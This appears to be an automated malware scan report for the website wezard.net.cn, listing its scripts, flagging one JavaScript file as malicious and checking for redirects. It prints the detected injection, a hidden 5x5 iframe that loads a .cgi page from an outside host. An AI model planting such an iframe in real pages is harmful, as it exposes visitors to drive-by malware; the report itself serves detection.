Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wezard.net.cn
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wezard.net.cn/ | 200 OK Content-Length: 74975 Content-Type: text/html | clean |
http://wezard.net.cn/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highlight/highlight.js | 200 OK Content-Length: 362 Content-Type: application/javascript | clean |
http://wezard.net.cn/media/system/js/modal.js | 200 OK Content-Length: 10587 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/system/iewarning/js/warning.js | 200 OK Content-Length: 8025 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/highslide-full.packed.js | 200 OK Content-Length: 47447 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/easing_equations.js | 200 OK Content-Length: 9387 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/swfobject.js | 200 OK Content-Length: 9758 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/config/js/highslide-sitesettings.js | 200 OK Content-Length: 7714 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/thememagic/media/js/jquery.magic.min.js | 200 OK Content-Length: 57321 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/thememagic/media/js/jquery.tools.min.js | 200 OK Content-Length: 32068 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/thememagic/media/js/colorpicker/js/colorpicker.min.js | 200 OK Content-Length: 13286 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){var ColorPicker=function(){var ids={},inAction,charMin=65,visible,tpl='<div class="colorpicker"><div class="colorpicker_color"><div><div></div></div></div><div class="colorpicker_hue"><div></div></div><div class="colorpicker_new_color"></div><div class="colorpicker_current_color"></div><div class="colorpicker_hex"><input type="text" maxlength="6" size="6" /></div><div class Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8 <iframe src="http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"> | ||
http://wezard.net.cn/templates/ethos/media/js/jxtcpngfix.js | 200 OK Content-Length: 1013 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/media/js/scripts.js | 200 OK Content-Length: 608 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/media/js/jquery.easing.min.js | 200 OK Content-Length: 4756 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wezard.net.cn
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 18:54:33 GMT
Pragma: no-cache
ETag: 702e5a9801d2f7a5456e3e1cf4c5c93f
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 18:54:34 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1607e2305a69b6d9a143af64a4fc42e1=ak1t8aiodf3mjk04isjc7r6nh2; path=/
GET / HTTP/1.1
Host: wezard.net.cn
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 18:54:33 GMT
Pragma: no-cache
ETag: 702e5a9801d2f7a5456e3e1cf4c5c93f
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 18:54:34 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1607e2305a69b6d9a143af64a4fc42e1=ak1t8aiodf3mjk04isjc7r6nh2; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: wezard.net.cn
Referer: http://www.google.com/search?q=wezard.net.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wezard.net.cn
Referer: http://www.google.com/search?q=wezard.net.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.